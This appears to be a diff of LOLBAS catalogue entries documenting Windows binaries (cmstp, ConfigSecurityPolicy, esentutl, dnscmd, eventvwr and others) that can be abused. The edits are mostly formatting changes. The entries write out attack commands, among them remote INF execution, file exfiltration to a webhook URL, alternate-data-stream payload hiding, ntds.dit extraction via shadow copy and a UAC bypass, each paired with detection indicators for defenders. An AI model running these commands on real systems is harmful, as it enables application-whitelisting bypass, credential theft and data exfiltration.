- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass Category: AwL bypass
Privileges: User Privileges: User
MitreID: T1191 MitreID: T1191
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use - IOC: Execution of cmstp.exe should not be normal unless VPN is in use
@ -40,4 +40,4 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@NickTyrer' Handle: '@NickTyrer'
--- ---

View File

@ -2,7 +2,7 @@
Name: ConfigSecurityPolicy.exe Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira' Author: 'Ialle Teixeira'
Created: '04/09/2020' Created: 2020-09-04
Commands: Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general Description: Upload file, credentials or data exfiltration in general
@ -14,9 +14,9 @@ Commands:
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: ConfigSecurityPolicy storing data into alternate data streams. - IOC: ConfigSecurityPolicy storing data into alternate data streams.
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.

View File

@ -2,7 +2,7 @@
Name: Control.exe Name: Control.exe
Description: Binary used to launch controlpanel items in Windows Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll - Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\control.exe - Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe - Path: C:\Windows\SysWOW64\control.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Control.exe executing files from alternate data streams. - IOC: Control.exe executing files from alternate data streams.
@ -28,4 +28,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
--- ---

View File

@ -1,8 +1,8 @@
--- ---
Name: Csc.exe Name: Csc.exe
Description: Binary file used by .NET to compile C# code Description: Binary file used by .NET to compile C# code
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: csc.exe -out:My.exe File.cs - Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
@ -23,13 +23,13 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Csc.exe should normally not run a system unless it is used for development. - IOC: Csc.exe should normally not run a system unless it is used for development.
Resources: Resources:
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
--- ---

View File

@ -2,7 +2,7 @@
Name: Cscript.exe Name: Cscript.exe
Description: Binary used to execute scripts in Windows Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: cscript c:\ads\file.txt:script.vbs - Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Cscript.exe executing files from alternate data streams - IOC: Cscript.exe executing files from alternate data streams
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Desktopimgdownldr.exe Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal Author: Gal Kristal
Created: 28/06/2020 Created: 2020-06-28
Commands: Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen Description: Downloads the file and sets it as the computer's lockscreen
@ -14,9 +14,9 @@ Commands:
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: c:\windows\system32\desktopimgdownldr.exe - Path: c:\windows\system32\desktopimgdownldr.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: desktopimgdownldr.exe that creates non-image file - IOC: desktopimgdownldr.exe that creates non-image file
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
Resources: Resources:

View File

@ -2,9 +2,9 @@
Name: Dfsvc.exe Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url Description: Executes click-once-application from Url
Usecase: Use binary to bypass Application whitelisting Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass Category: AWL bypass
@ -17,14 +17,14 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

View File

@ -2,11 +2,11 @@
Name: Diantz.exe Name: Diantz.exe
Description: Binary that package existing files into a cabinet (.cab) file Description: Binary that package existing files into a cabinet (.cab) file
Author: 'Tamir Yehuda' Author: 'Tamir Yehuda'
Created: '08/08/2020' Created: 2020-08-08
Commands: Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an Alternate Data Stream. Usecase: Hide data compressed into an Alternate Data Stream.
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T1096 MitreID: T1096
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine. Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file. Usecase: Download and compress into a cab file.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
@ -23,9 +23,9 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\diantz.exe - Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe - Path: c:\windows\syswow64\diantz.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: diantz storing data into alternate data streams. - IOC: diantz storing data into alternate data streams.
- IOC: diantz getting a file from a remote machine or the internet. - IOC: diantz getting a file from a remote machine or the internet.
Resources: Resources:

View File

@ -2,7 +2,7 @@
Name: Diskshadow.exe Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt - Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script. Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Child process from diskshadow.exe - IOC: Child process from diskshadow.exe
@ -33,4 +33,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
--- ---

View File

@ -2,7 +2,7 @@
Name: Dnscmd.exe Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Dnscmd.exe loading dll from UNC path - IOC: Dnscmd.exe loading dll from UNC path
@ -32,4 +32,4 @@ Acknowledgement:
Handle: '@dim0x69' Handle: '@dim0x69'
- Person: Nikhil SamratAshok - Person: Nikhil SamratAshok
Handle: '@nikhil_mitt' Handle: '@nikhil_mitt'
--- ---

View File

@ -2,12 +2,12 @@
Name: Esentutl.exe Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file. Description: Copies the source VBS file to the destination VBS file.
Usecase: Copies files from A to B Usecase: Copies files from A to B
Category: Copy Category: Copy
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
@ -29,7 +29,7 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS Category: ADS
Privileges: User Privileges: User
@ -47,7 +47,7 @@ Commands:
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
Description: Copies a (locked) file using Volume Shadow Copy Description: Copies a (locked) file using Volume Shadow Copy
Usecase: Copy/extract a locked file such as the AD Database Usecase: Copy/extract a locked file such as the AD Database
Category: Copy Category: Copy
Privileges: Admin Privileges: Admin
MitreID: T1003 MitreID: T1003
MitreLink: https://attack.mitre.org/techniques/T1003/ MitreLink: https://attack.mitre.org/techniques/T1003/
@ -55,10 +55,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://twitter.com/egre55/status/985994639202283520
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

View File

@ -2,11 +2,11 @@
Name: Eventvwr.exe Name: Eventvwr.exe
Description: Displays Windows Event Logs in a GUI window. Description: Displays Windows Event Logs in a GUI window.
Author: 'Jacob Gajek' Author: 'Jacob Gajek'
Created: '2018-11-01' Created: 2018-11-01
Commands: Commands:
- Command: eventvwr.exe - Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass Category: UAC bypass
Privileges: User Privileges: User
MitreID: T1088 MitreID: T1088
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe
Code Sample: Code_Sample:
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Detection: Detection:
- IOC: eventvwr.exe launching child process other than mmc.exe - IOC: eventvwr.exe launching child process other than mmc.exe

View File

@ -2,7 +2,7 @@
Name: Expand.exe Name: Expand.exe
Description: Binary that expands one or more compressed files Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: Copies source file to destination. Description: Copies source file to destination.
@ -31,10 +31,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/infosecn1nja/status/986628482858807297
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@ -43,4 +43,4 @@ Acknowledgement:
Handle: '@infosecn1nja' Handle: '@infosecn1nja'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Explorer.exe Name: Explorer.exe
Description: Binary used for managing files and system components within Windows Description: Binary used for managing files and system components within Windows
Author: 'Jai Minton' Author: 'Jai Minton'
Created: '2020-06-24' Created: 2020-06-24
Commands: Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\explorer.exe - Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this. - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.

View File

@ -1,8 +1,8 @@
--- ---
Name: Extexport.exe Name: Extexport.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Extexport.exe c:\test foo bar - Command: Extexport.exe c:\test foo bar
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Extexport.exe loads dll and is execute from other folder the original path - IOC: Extexport.exe loads dll and is execute from other folder the original path
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'
--- ---

View File

@ -1,12 +1,12 @@
--- ---
Name: Extrac32.exe Name: Extrac32.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream. Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T1096 MitreID: T1096
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream. Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T1096 MitreID: T1096
@ -39,10 +39,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

View File

@ -1,8 +1,8 @@
--- ---
Name: Findstr.exe Name: Findstr.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
@ -39,14 +39,14 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: finstr.exe should normally not be invoked on a client system - IOC: findstr.exe should normally not be invoked on a client system
Resources: Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Forfiles.exe Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
@ -23,10 +23,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://twitter.com/vector_sec/status/896049052642533376
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -36,4 +36,4 @@ Acknowledgement:
Handle: '@vector_sec' Handle: '@vector_sec'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Ftp.exe Name: Ftp.exe
Description: A binary designed for connecting to FTP servers Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-12-10' Created: 2018-12-10
Commands: Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file. Description: Executes the commands you put inside the text file.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: cmd /c as child process of ftp.exe - IOC: cmd /c as child process of ftp.exe

View File

@ -2,7 +2,7 @@
Name: GfxDownloadWrapper.exe Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez Author: Jesus Galvez
Created: Jesus Galvez Created: 2019-12-27
Commands: Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
@ -169,7 +169,7 @@ Full_Path:
